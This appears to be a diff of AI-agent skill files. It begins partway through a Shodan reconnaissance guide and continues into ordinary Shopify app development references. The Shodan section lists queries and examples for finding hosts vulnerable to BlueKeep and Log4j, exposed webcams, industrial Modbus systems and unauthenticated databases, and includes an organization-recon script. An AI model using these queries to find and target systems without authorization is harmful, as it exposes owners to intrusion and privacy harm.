# Check specific scan status
|
||||
shodan scan status SCAN_ID
|
||||
|
||||
# Download scan results later
|
||||
shodan download --limit -1 results.json.gz scan:SCAN_ID
|
||||
```
|
||||
|
||||
#### Available Scan Protocols
|
||||
```bash
|
||||
# List available protocols/modules
|
||||
shodan scan protocols
|
||||
```
|
||||
|
||||
### 6. Statistics and Analysis
|
||||
|
||||
#### Get Search Statistics
|
||||
```bash
|
||||
# Default statistics (top 10 countries, orgs)
|
||||
shodan stats nginx
|
||||
|
||||
# Custom facets
|
||||
shodan stats --facets domain,port,asn --limit 5 nginx
|
||||
|
||||
# Save to CSV
|
||||
shodan stats --facets country,org -O stats.csv apache
|
||||
```
|
||||
|
||||
### 7. Network Monitoring
|
||||
|
||||
#### Setup Alerts (Web Interface)
|
||||
```
|
||||
1. Navigate to Monitor Dashboard
|
||||
2. Add IP, range, or domain to monitor
|
||||
3. Configure notification service (email, Slack, webhook)
|
||||
4. Select trigger events (new service, vulnerability, etc.)
|
||||
5. View dashboard for exposed services
|
||||
```
|
||||
|
||||
### 8. REST API Usage
|
||||
|
||||
#### Direct API Calls
|
||||
```bash
|
||||
# Get API info
|
||||
curl -s "https://api.shodan.io/api-info?key=YOUR_KEY" | jq
|
||||
|
||||
# Host lookup
|
||||
curl -s "https://api.shodan.io/shodan/host/1.1.1.1?key=YOUR_KEY" | jq
|
||||
|
||||
# Search query
|
||||
curl -s "https://api.shodan.io/shodan/host/search?key=YOUR_KEY&query=apache" | jq
|
||||
```
|
||||
|
||||
#### Python Library
|
||||
```python
|
||||
import shodan
|
||||
|
||||
api = shodan.Shodan('YOUR_API_KEY')
|
||||
|
||||
# Search
|
||||
results = api.search('apache')
|
||||
print(f'Results found: {results["total"]}')
|
||||
for result in results['matches']:
|
||||
print(f'IP: {result["ip_str"]}')
|
||||
|
||||
# Host lookup
|
||||
host = api.host('1.1.1.1')
|
||||
print(f'IP: {host["ip_str"]}')
|
||||
print(f'Organization: {host.get("org", "n/a")}')
|
||||
for item in host['data']:
|
||||
print(f'Port: {item["port"]}')
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Essential CLI Commands
|
||||
|
||||
| Command | Description | Credits |
|
||||
|---------|-------------|---------|
|
||||
| `shodan init KEY` | Initialize API key | 0 |
|
||||
| `shodan info` | Show account info | 0 |
|
||||
| `shodan myip` | Show your IP | 0 |
|
||||
| `shodan host IP` | Host details | 0 |
|
||||
| `shodan count QUERY` | Result count | 0 |
|
||||
| `shodan search QUERY` | Basic search | 0* |
|
||||
| `shodan download FILE QUERY` | Save results | 1/100 results |
|
||||
| `shodan parse FILE` | Extract data | 0 |
|
||||
| `shodan stats QUERY` | Statistics | 1 |
|
||||
| `shodan scan submit IP` | On-demand scan | 1/IP |
|
||||
| `shodan honeyscore IP` | Honeypot check | 0 |
|
||||
|
||||
*Filters consume 1 credit per query
|
||||
|
||||
### Common Search Queries
|
||||
|
||||
| Purpose | Query |
|
||||
|---------|-------|
|
||||
| Find webcams | `webcam has_screenshot:true` |
|
||||
| MongoDB databases | `product:mongodb` |
|
||||
| Redis servers | `product:redis` |
|
||||
| Elasticsearch | `product:elastic port:9200` |
|
||||
| Default passwords | `"default password"` |
|
||||
| Vulnerable RDP | `port:3389 vuln:CVE-2019-0708` |
|
||||
| Industrial systems | `port:502 modbus` |
|
||||
| Cisco devices | `product:cisco` |
|
||||
| Open VNC | `port:5900 authentication disabled` |
|
||||
| Exposed FTP | `port:21 anonymous` |
|
||||
| WordPress sites | `http.component:wordpress` |
|
||||
| Printers | `"HP-ChaiSOE" port:80` |
|
||||
| Cameras (RTSP) | `port:554 has_screenshot:true` |
|
||||
| Jenkins servers | `X-Jenkins port:8080` |
|
||||
| Docker APIs | `port:2375 product:docker` |
|
||||
|
||||
### Useful Filter Combinations
|
||||
|
||||
| Scenario | Query |
|
||||
|---------|-------|
|
||||
| Target org recon | `org:"Company Name"` |
|
||||
| Domain enumeration | `hostname:example.com` |
|
||||
| Network range scan | `net:192.168.0.0/24` |
|
||||
| SSL cert search | `ssl.cert.subject.cn:*.target.com` |
|
||||
| Vulnerable servers | `vuln:CVE-2021-44228 country:US` |
|
||||
| Exposed admin panels | `http.title:"admin" port:443` |
|
||||
| Database exposure | `port:3306,5432,27017,6379` |
|
||||
|
||||
### Credit System
|
||||
|
||||
| Action | Credit Type | Cost |
|
||||
|--------|-------------|------|
|
||||
| Basic search | Query | 0 (no filters) |
|
||||
| Filtered search | Query | 1 |
|
||||
| Download 100 results | Query | 1 |
|
||||
| Generate report | Query | 1 |
|
||||
| Scan 1 IP | Scan | 1 |
|
||||
| Network monitoring | Monitored IPs | Depends on plan |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Operational Boundaries
|
||||
- Rate limited to 1 request per second
|
||||
- Scan results not immediate (asynchronous)
|
||||
- Cannot re-scan same IP within 24 hours (non-Enterprise)
|
||||
- Free accounts have limited credits
|
||||
- Some data requires paid subscription
|
||||
|
||||
### Data Freshness
|
||||
- Shodan crawls continuously but data may be days/weeks old
|
||||
- On-demand scans provide current data but cost credits
|
||||
- Historical data available with paid plans
|
||||
|
||||
### Legal Requirements
|
||||
- Only perform reconnaissance on authorized targets
|
||||
- Passive reconnaissance generally legal but verify jurisdiction
|
||||
- Active scanning (scan submit) requires authorization
|
||||
- Document all reconnaissance activities
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Organization Reconnaissance
|
||||
```bash
|
||||
# Find all hosts belonging to target organization
|
||||
shodan search 'org:"Target Company"'
|
||||
|
||||
# Get statistics on their infrastructure
|
||||
shodan stats --facets port,product,country 'org:"Target Company"'
|
||||
|
||||
# Download detailed data
|
||||
shodan download target_data.json.gz 'org:"Target Company"'
|
||||
|
||||
# Parse for specific info
|
||||
shodan parse --fields ip_str,port,product target_data.json.gz
|
||||
```
|
||||
|
||||
### Example 2: Vulnerable Service Discovery
|
||||
```bash
|
||||
# Find hosts vulnerable to BlueKeep (RDP CVE)
|
||||
shodan search 'vuln:CVE-2019-0708 country:US'
|
||||
|
||||
# Find exposed Elasticsearch with no auth
|
||||
shodan search 'product:elastic port:9200 -authentication'
|
||||
|
||||
# Find Log4j vulnerable systems
|
||||
shodan search 'vuln:CVE-2021-44228'
|
||||
```
|
||||
|
||||
### Example 3: IoT Device Discovery
|
||||
```bash
|
||||
# Find exposed webcams
|
||||
shodan search 'webcam has_screenshot:true country:US'
|
||||
|
||||
# Find industrial control systems
|
||||
shodan search 'port:502 product:modbus'
|
||||
|
||||
# Find exposed printers
|
||||
shodan search '"HP-ChaiSOE" port:80'
|
||||
|
||||
# Find smart home devices
|
||||
shodan search 'product:nest'
|
||||
```
|
||||
|
||||
### Example 4: SSL/TLS Certificate Analysis
|
||||
```bash
|
||||
# Find hosts with specific SSL cert
|
||||
shodan search 'ssl.cert.subject.cn:*.example.com'
|
||||
|
||||
# Find expired certificates
|
||||
shodan search 'ssl.cert.expired:true org:"Company"'
|
||||
|
||||
# Find self-signed certificates
|
||||
shodan search 'ssl.cert.issuer.cn:self-signed'
|
||||
```
|
||||
|
||||
### Example 5: Python Automation Script
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import shodan
|
||||
import json
|
||||
|
||||
API_KEY = 'YOUR_API_KEY'
|
||||
api = shodan.Shodan(API_KEY)
|
||||
|
||||
def recon_organization(org_name):
|
||||
"""Perform reconnaissance on an organization"""
|
||||
try:
|
||||
# Search for organization
|
||||
query = f'org:"{org_name}"'
|
||||
results = api.search(query)
|
||||
|
||||
print(f"[*] Found {results['total']} hosts for {org_name}")
|
||||
|
||||
# Collect unique IPs and ports
|
||||
hosts = {}
|
||||
for result in results['matches']:
|
||||
ip = result['ip_str']
|
||||
port = result['port']
|
||||
product = result.get('product', 'unknown')
|
||||
|
||||
if ip not in hosts:
|
||||
hosts[ip] = []
|
||||
hosts[ip].append({'port': port, 'product': product})
|
||||
|
||||
# Output findings
|
||||
for ip, services in hosts.items():
|
||||
print(f"\n[+] {ip}")
|
||||
for svc in services:
|
||||
print(f" - {svc['port']}/tcp ({svc['product']})")
|
||||
|
||||
return hosts
|
||||
|
||||
except shodan.APIError as e:
|
||||
print(f"Error: {e}")
|
||||
return None
|
||||
|
||||
if __name__ == '__main__':
|
||||
recon_organization("Target Company")
|
||||
```
|
||||
|
||||
### Example 6: Network Range Assessment
|
||||
```bash
|
||||
# Scan a /24 network range
|
||||
shodan search 'net:192.168.1.0/24'
|
||||
|
||||
# Get port distribution
|
||||
shodan stats --facets port 'net:192.168.1.0/24'
|
||||
|
||||
# Find specific vulnerabilities in range
|
||||
shodan search 'net:192.168.1.0/24 vuln:CVE-2021-44228'
|
||||
|
||||
# Export all data for range
|
||||
shodan download network_scan.json.gz 'net:192.168.1.0/24'
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Cause | Solution |
|
||||
|-------|-------|----------|
|
||||
| No API Key Configured | Key not initialized | Run `shodan init YOUR_API_KEY` then verify with `shodan info` |
|
||||
| Query Credits Exhausted | Monthly credits consumed | Use credit-free queries (no filters), wait for reset, or upgrade |
|
||||
| Host Recently Crawled | Cannot re-scan IP within 24h | Use `shodan host IP` for existing data, or wait 24 hours |
|
||||
| Rate Limit Exceeded | >1 request/second | Add `time.sleep(1)` between API requests |
|
||||
| Empty Search Results | Too specific or syntax error | Use quotes for phrases: `'org:"Company Name"'`; broaden criteria |
|
||||
| Downloaded File Won't Parse | Corrupted or wrong format | Verify with `gunzip -t file.gz`, re-download with `--limit` |
|
||||
42
skills/shopify-apps/SKILL.md
Normal file
42
skills/shopify-apps/SKILL.md
Normal file
@@ -0,0 +1,42 @@
|
||||
---
|
||||
name: shopify-apps
|
||||
description: "Expert patterns for Shopify app development including Remix/React Router apps, embedded apps with App Bridge, webhook handling, GraphQL Admin API, Polaris components, billing, and app extensions. Use when: shopify app, shopify, embedded app, polaris, app bridge."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Shopify Apps
|
||||
|
||||
## Patterns
|
||||
|
||||
### React Router App Setup
|
||||
|
||||
Modern Shopify app template with React Router
|
||||
|
||||
### Embedded App with App Bridge
|
||||
|
||||
Render app embedded in Shopify Admin
|
||||
|
||||
### Webhook Handling
|
||||
|
||||
Secure webhook processing with HMAC verification
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ REST API for New Apps
|
||||
|
||||
### ❌ Webhook Processing Before Response
|
||||
|
||||
### ❌ Polling Instead of Webhooks
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Respond immediately, process asynchronously |
|
||||
| Issue | high | ## Check rate limit headers |
|
||||
| Issue | high | ## Request protected customer data access |
|
||||
| Issue | medium | ## Use TOML only (recommended) |
|
||||
| Issue | medium | ## Handle both URL formats |
|
||||
| Issue | high | ## Use GraphQL for all new code |
|
||||
| Issue | high | ## Use latest App Bridge via script tag |
|
||||
| Issue | high | ## Implement all GDPR handlers |
|
||||
60
skills/shopify-development/README.md
Normal file
60
skills/shopify-development/README.md
Normal file
@@ -0,0 +1,60 @@
|
||||
# Shopify Development Skill
|
||||
|
||||
Comprehensive skill for building on Shopify platform: apps, extensions, themes, and API integrations.
|
||||
|
||||
## Features
|
||||
|
||||
- **App Development** - OAuth authentication, GraphQL Admin API, webhooks, billing integration
|
||||
- **UI Extensions** - Checkout, Admin, POS customizations with Polaris components
|
||||
- **Theme Development** - Liquid templating, sections, snippets
|
||||
- **Shopify Functions** - Custom discounts, payment, delivery rules
|
||||
|
||||
## Structure
|
||||
|
||||
```
|
||||
shopify-development/
|
||||
├── SKILL.md # Main skill file (AI-optimized)
|
||||
├── README.md # This file
|
||||
├── references/
|
||||
│ ├── app-development.md # OAuth, API, webhooks, billing
|
||||
│ ├── extensions.md # UI extensions, Functions
|
||||
│ └── themes.md # Liquid, theme architecture
|
||||
└── scripts/
|
||||
├── shopify_init.py # Interactive project scaffolding
|
||||
├── shopify_graphql.py # GraphQL utilities & templates
|
||||
└── tests/ # Unit tests
|
||||
```
|
||||
|
||||
## Validated GraphQL
|
||||
|
||||
All GraphQL queries and mutations in this skill have been validated against Shopify Admin API 2026-01 schema using the official Shopify MCP.
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Install Shopify CLI
|
||||
npm install -g @shopify/cli@latest
|
||||
|
||||
# Create new app
|
||||
shopify app init
|
||||
|
||||
# Start development
|
||||
shopify app dev
|
||||
```
|
||||
|
||||
## Usage Triggers
|
||||
|
||||
This skill activates when the user mentions:
|
||||
|
||||
- "shopify app", "shopify extension", "shopify theme"
|
||||
- "checkout extension", "admin extension", "POS extension"
|
||||
- "liquid template", "polaris", "shopify graphql"
|
||||
- "shopify webhook", "shopify billing", "metafields"
|
||||
|
||||
## API Version
|
||||
|
||||
Current: **2026-01** (Quarterly releases with 12-month support)
|
||||
|
||||
## License
|
||||
|
||||
MIT
|
||||
366
skills/shopify-development/SKILL.md
Normal file
366
skills/shopify-development/SKILL.md
Normal file
@@ -0,0 +1,366 @@
|
||||
---
|
||||
name: shopify-development
|
||||
description: |
|
||||
Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid.
|
||||
TRIGGER: "shopify", "shopify app", "checkout extension", "admin extension", "POS extension",
|
||||
"shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook",
|
||||
"shopify billing", "app subscription", "metafields", "shopify functions"
|
||||
---
|
||||
|
||||
# Shopify Development Skill
|
||||
|
||||
Use this skill when the user asks about:
|
||||
|
||||
- Building Shopify apps or extensions
|
||||
- Creating checkout/admin/POS UI customizations
|
||||
- Developing themes with Liquid templating
|
||||
- Integrating with Shopify GraphQL or REST APIs
|
||||
- Implementing webhooks or billing
|
||||
- Working with metafields or Shopify Functions
|
||||
|
||||
---
|
||||
|
||||
## ROUTING: What to Build
|
||||
|
||||
**IF user wants to integrate external services OR build merchant tools OR charge for features:**
|
||||
→ Build an **App** (see `references/app-development.md`)
|
||||
|
||||
**IF user wants to customize checkout OR add admin UI OR create POS actions OR implement discount rules:**
|
||||
→ Build an **Extension** (see `references/extensions.md`)
|
||||
|
||||
**IF user wants to customize storefront design OR modify product/collection pages:**
|
||||
→ Build a **Theme** (see `references/themes.md`)
|
||||
|
||||
**IF user needs both backend logic AND storefront UI:**
|
||||
→ Build **App + Theme Extension** combination
|
||||
|
||||
---
|
||||
|
||||
## Shopify CLI Commands
|
||||
|
||||
Install CLI:
|
||||
|
||||
```bash
|
||||
npm install -g @shopify/cli@latest
|
||||
```
|
||||
|
||||
Create and run app:
|
||||
|
||||
```bash
|
||||
shopify app init # Create new app
|
||||
shopify app dev # Start dev server with tunnel
|
||||
shopify app deploy # Build and upload to Shopify
|
||||
```
|
||||
|
||||
Generate extension:
|
||||
|
||||
```bash
|
||||
shopify app generate extension --type checkout_ui_extension
|
||||
shopify app generate extension --type admin_action
|
||||
shopify app generate extension --type admin_block
|
||||
shopify app generate extension --type pos_ui_extension
|
||||
shopify app generate extension --type function
|
||||
```
|
||||
|
||||
Theme development:
|
||||
|
||||
```bash
|
||||
shopify theme init # Create new theme
|
||||
shopify theme dev # Start local preview at localhost:9292
|
||||
shopify theme pull --live # Pull live theme
|
||||
shopify theme push --development # Push to dev theme
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Access Scopes
|
||||
|
||||
Configure in `shopify.app.toml`:
|
||||
|
||||
```toml
|
||||
[access_scopes]
|
||||
scopes = "read_products,write_products,read_orders,write_orders,read_customers"
|
||||
```
|
||||
|
||||
Common scopes:
|
||||
|
||||
- `read_products`, `write_products` - Product catalog access
|
||||
- `read_orders`, `write_orders` - Order management
|
||||
- `read_customers`, `write_customers` - Customer data
|
||||
- `read_inventory`, `write_inventory` - Stock levels
|
||||
- `read_fulfillments`, `write_fulfillments` - Order fulfillment
|
||||
|
||||
---
|
||||
|
||||
## GraphQL Patterns (Validated against API 2026-01)
|
||||
|
||||
### Query Products
|
||||
|
||||
```graphql
|
||||
query GetProducts($first: Int!, $query: String) {
|
||||
products(first: $first, query: $query) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
title
|
||||
handle
|
||||
status
|
||||
variants(first: 5) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
price
|
||||
inventoryQuantity
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Query Orders
|
||||
|
||||
```graphql
|
||||
query GetOrders($first: Int!) {
|
||||
orders(first: $first) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
name
|
||||
createdAt
|
||||
displayFinancialStatus
|
||||
totalPriceSet {
|
||||
shopMoney {
|
||||
amount
|
||||
currencyCode
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Set Metafields
|
||||
|
||||
```graphql
|
||||
mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
|
||||
metafieldsSet(metafields: $metafields) {
|
||||
metafields {
|
||||
id
|
||||
namespace
|
||||
key
|
||||
value
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables example:
|
||||
|
||||
```json
|
||||
{
|
||||
"metafields": [
|
||||
{
|
||||
"ownerId": "gid://shopify/Product/123",
|
||||
"namespace": "custom",
|
||||
"key": "care_instructions",
|
||||
"value": "Handle with care",
|
||||
"type": "single_line_text_field"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Checkout Extension Example
|
||||
|
||||
```tsx
|
||||
import {
|
||||
reactExtension,
|
||||
BlockStack,
|
||||
TextField,
|
||||
Checkbox,
|
||||
useApplyAttributeChange,
|
||||
} from "@shopify/ui-extensions-react/checkout";
|
||||
|
||||
export default reactExtension("purchase.checkout.block.render", () => (
|
||||
<GiftMessage />
|
||||
));
|
||||
|
||||
function GiftMessage() {
|
||||
const [isGift, setIsGift] = useState(false);
|
||||
const [message, setMessage] = useState("");
|
||||
const applyAttributeChange = useApplyAttributeChange();
|
||||
|
||||
useEffect(() => {
|
||||
if (isGift && message) {
|
||||
applyAttributeChange({
|
||||
type: "updateAttribute",
|
||||
key: "gift_message",
|
||||
value: message,
|
||||
});
|
||||
}
|
||||
}, [isGift, message]);
|
||||
|
||||
return (
|
||||
<BlockStack spacing="loose">
|
||||
<Checkbox checked={isGift} onChange={setIsGift}>
|
||||
This is a gift
|
||||
</Checkbox>
|
||||
{isGift && (
|
||||
<TextField
|
||||
label="Gift Message"
|
||||
value={message}
|
||||
onChange={setMessage}
|
||||
multiline={3}
|
||||
/>
|
||||
)}
|
||||
</BlockStack>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Liquid Template Example
|
||||
|
||||
```liquid
|
||||
{% comment %} Product Card Snippet {% endcomment %}
|
||||
<div class="product-card">
|
||||
<a href="{{ product.url }}">
|
||||
{% if product.featured_image %}
|
||||
<img
|
||||
src="{{ product.featured_image | img_url: 'medium' }}"
|
||||
alt="{{ product.title | escape }}"
|
||||
loading="lazy"
|
||||
>
|
||||
{% endif %}
|
||||
<h3>{{ product.title }}</h3>
|
||||
<p class="price">{{ product.price | money }}</p>
|
||||
{% if product.compare_at_price > product.price %}
|
||||
<p class="sale-badge">Sale</p>
|
||||
{% endif %}
|
||||
</a>
|
||||
</div>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Webhook Configuration
|
||||
|
||||
In `shopify.app.toml`:
|
||||
|
||||
```toml
|
||||
[webhooks]
|
||||
api_version = "2026-01"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["orders/create", "orders/updated"]
|
||||
uri = "/webhooks/orders"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["products/update"]
|
||||
uri = "/webhooks/products"
|
||||
|
||||
# GDPR mandatory webhooks (required for app approval)
|
||||
[webhooks.privacy_compliance]
|
||||
customer_data_request_url = "/webhooks/gdpr/data-request"
|
||||
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
|
||||
shop_deletion_url = "/webhooks/gdpr/shop-deletion"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices
|
||||
|
||||
### API Usage
|
||||
|
||||
- Use GraphQL over REST for new development
|
||||
- Request only fields you need (reduces query cost)
|
||||
- Implement cursor-based pagination with `pageInfo.endCursor`
|
||||
- Use bulk operations for processing more than 250 items
|
||||
- Handle rate limits with exponential backoff
|
||||
|
||||
### Security
|
||||
|
||||
- Store API credentials in environment variables
|
||||
- Always verify webhook HMAC signatures before processing
|
||||
- Validate OAuth state parameter to prevent CSRF
|
||||
- Request minimal access scopes
|
||||
- Use session tokens for embedded apps
|
||||
|
||||
### Performance
|
||||
|
||||
- Cache API responses when data doesn't change frequently
|
||||
- Use lazy loading in extensions
|
||||
- Optimize images in themes using `img_url` filter
|
||||
- Monitor GraphQL query costs via response headers
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
**IF you see rate limit errors:**
|
||||
→ Implement exponential backoff retry logic
|
||||
→ Switch to bulk operations for large datasets
|
||||
→ Monitor `X-Shopify-Shop-Api-Call-Limit` header
|
||||
|
||||
**IF authentication fails:**
|
||||
→ Verify the access token is still valid
|
||||
→ Check that all required scopes were granted
|
||||
→ Ensure OAuth flow completed successfully
|
||||
|
||||
**IF extension is not appearing:**
|
||||
→ Verify the extension target is correct
|
||||
→ Check that extension is published via `shopify app deploy`
|
||||
→ Confirm the app is installed on the test store
|
||||
|
||||
**IF webhook is not receiving events:**
|
||||
→ Verify the webhook URL is publicly accessible
|
||||
→ Check HMAC signature validation logic
|
||||
→ Review webhook logs in Partner Dashboard
|
||||
|
||||
**IF GraphQL query fails:**
|
||||
→ Validate query against schema (use GraphiQL explorer)
|
||||
→ Check for deprecated fields in error message
|
||||
→ Verify you have required access scopes
|
||||
|
||||
---
|
||||
|
||||
## Reference Files
|
||||
|
||||
For detailed implementation guides, read these files:
|
||||
|
||||
- `references/app-development.md` - OAuth authentication flow, GraphQL mutations for products/orders/billing, webhook handlers, billing API integration
|
||||
- `references/extensions.md` - Checkout UI components, Admin UI extensions, POS extensions, Shopify Functions for discounts/payment/delivery
|
||||
- `references/themes.md` - Liquid syntax reference, theme directory structure, sections and snippets, common patterns
|
||||
|
||||
---
|
||||
|
||||
## Scripts
|
||||
|
||||
- `scripts/shopify_init.py` - Interactive project scaffolding. Run: `python scripts/shopify_init.py`
|
||||
- `scripts/shopify_graphql.py` - GraphQL utilities with query templates, pagination, rate limiting. Import: `from shopify_graphql import ShopifyGraphQL`
|
||||
|
||||
---
|
||||
|
||||
## Official Documentation Links
|
||||
|
||||
- Shopify Developer Docs: https://shopify.dev/docs
|
||||
- GraphQL Admin API Reference: https://shopify.dev/docs/api/admin-graphql
|
||||
- Shopify CLI Reference: https://shopify.dev/docs/api/shopify-cli
|
||||
- Polaris Design System: https://polaris.shopify.com
|
||||
|
||||
API Version: 2026-01 (quarterly releases, 12-month deprecation window)
|
||||
578
skills/shopify-development/references/app-development.md
Normal file
578
skills/shopify-development/references/app-development.md
Normal file
@@ -0,0 +1,578 @@
|
||||
# App Development Reference
|
||||
|
||||
Guide for building Shopify apps with OAuth, GraphQL/REST APIs, webhooks, and billing.
|
||||
|
||||
## OAuth Authentication
|
||||
|
||||
### OAuth 2.0 Flow
|
||||
|
||||
**1. Redirect to Authorization URL:**
|
||||
|
||||
```
|
||||
https://{shop}.myshopify.com/admin/oauth/authorize?
|
||||
client_id={api_key}&
|
||||
scope={scopes}&
|
||||
redirect_uri={redirect_uri}&
|
||||
state={nonce}
|
||||
```
|
||||
|
||||
**2. Handle Callback:**
|
||||
|
||||
```javascript
|
||||
app.get("/auth/callback", async (req, res) => {
|
||||
const { code, shop, state } = req.query;
|
||||
|
||||
// Verify state to prevent CSRF
|
||||
if (state !== storedState) {
|
||||
return res.status(403).send("Invalid state");
|
||||
}
|
||||
|
||||
// Exchange code for access token
|
||||
const accessToken = await exchangeCodeForToken(shop, code);
|
||||
|
||||
// Store token securely
|
||||
await storeAccessToken(shop, accessToken);
|
||||
|
||||
res.redirect(`https://${shop}/admin/apps/${appHandle}`);
|
||||
});
|
||||
```
|
||||
|
||||
**3. Exchange Code for Token:**
|
||||
|
||||
```javascript
|
||||
async function exchangeCodeForToken(shop, code) {
|
||||
const response = await fetch(`https://${shop}/admin/oauth/access_token`, {
|
||||
method: "POST",
|
||||
headers: { "Content-Type": "application/json" },
|
||||
body: JSON.stringify({
|
||||
client_id: process.env.SHOPIFY_API_KEY,
|
||||
client_secret: process.env.SHOPIFY_API_SECRET,
|
||||
code,
|
||||
}),
|
||||
});
|
||||
|
||||
const { access_token } = await response.json();
|
||||
return access_token;
|
||||
}
|
||||
```
|
||||
|
||||
### Access Scopes
|
||||
|
||||
**Common Scopes:**
|
||||
|
||||
- `read_products`, `write_products` - Product catalog
|
||||
- `read_orders`, `write_orders` - Order management
|
||||
- `read_customers`, `write_customers` - Customer data
|
||||
- `read_inventory`, `write_inventory` - Stock levels
|
||||
- `read_fulfillments`, `write_fulfillments` - Order fulfillment
|
||||
- `read_shipping`, `write_shipping` - Shipping rates
|
||||
- `read_analytics` - Store analytics
|
||||
- `read_checkouts`, `write_checkouts` - Checkout data
|
||||
|
||||
Full list: https://shopify.dev/api/usage/access-scopes
|
||||
|
||||
### Session Tokens (Embedded Apps)
|
||||
|
||||
For embedded apps using App Bridge:
|
||||
|
||||
```javascript
|
||||
import { getSessionToken } from '@shopify/app-bridge/utilities';
|
||||
|
||||
async function authenticatedFetch(url, options = {}) {
|
||||
const app = createApp({ ... });
|
||||
const token = await getSessionToken(app);
|
||||
|
||||
return fetch(url, {
|
||||
...options,
|
||||
headers: {
|
||||
...options.headers,
|
||||
'Authorization': `Bearer ${token}`
|
||||
}
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
## GraphQL Admin API
|
||||
|
||||
### Making Requests
|
||||
|
||||
```javascript
|
||||
async function graphqlRequest(shop, accessToken, query, variables = {}) {
|
||||
const response = await fetch(
|
||||
`https://${shop}/admin/api/2026-01/graphql.json`,
|
||||
{
|
||||
method: "POST",
|
||||
headers: {
|
||||
"X-Shopify-Access-Token": accessToken,
|
||||
"Content-Type": "application/json",
|
||||
},
|
||||
body: JSON.stringify({ query, variables }),
|
||||
},
|
||||
);
|
||||
|
||||
const data = await response.json();
|
||||
|
||||
if (data.errors) {
|
||||
throw new Error(`GraphQL errors: ${JSON.stringify(data.errors)}`);
|
||||
}
|
||||
|
||||
return data.data;
|
||||
}
|
||||
```
|
||||
|
||||
### Product Operations
|
||||
|
||||
**Create Product:**
|
||||
|
||||
```graphql
|
||||
mutation CreateProduct($input: ProductInput!) {
|
||||
productCreate(input: $input) {
|
||||
product {
|
||||
id
|
||||
title
|
||||
handle
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"input": {
|
||||
"title": "New Product",
|
||||
"productType": "Apparel",
|
||||
"vendor": "Brand",
|
||||
"status": "ACTIVE",
|
||||
"variants": [
|
||||
{ "price": "29.99", "sku": "SKU-001", "inventoryQuantity": 100 }
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Update Product:**
|
||||
|
||||
```graphql
|
||||
mutation UpdateProduct($input: ProductInput!) {
|
||||
productUpdate(input: $input) {
|
||||
product {
|
||||
id
|
||||
title
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Query Products:**
|
||||
|
||||
```graphql
|
||||
query GetProducts($first: Int!, $query: String) {
|
||||
products(first: $first, query: $query) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
title
|
||||
status
|
||||
variants(first: 5) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
price
|
||||
inventoryQuantity
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Order Operations
|
||||
|
||||
**Query Orders:**
|
||||
|
||||
```graphql
|
||||
query GetOrders($first: Int!) {
|
||||
orders(first: $first) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
name
|
||||
createdAt
|
||||
displayFinancialStatus
|
||||
totalPriceSet {
|
||||
shopMoney {
|
||||
amount
|
||||
currencyCode
|
||||
}
|
||||
}
|
||||
customer {
|
||||
email
|
||||
firstName
|
||||
lastName
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Fulfill Order:**
|
||||
|
||||
```graphql
|
||||
mutation FulfillOrder($fulfillment: FulfillmentInput!) {
|
||||
fulfillmentCreate(fulfillment: $fulfillment) {
|
||||
fulfillment {
|
||||
id
|
||||
status
|
||||
trackingInfo {
|
||||
number
|
||||
url
|
||||
}
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Webhooks
|
||||
|
||||
### Configuration
|
||||
|
||||
In `shopify.app.toml`:
|
||||
|
||||
```toml
|
||||
[webhooks]
|
||||
api_version = "2025-01"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["orders/create"]
|
||||
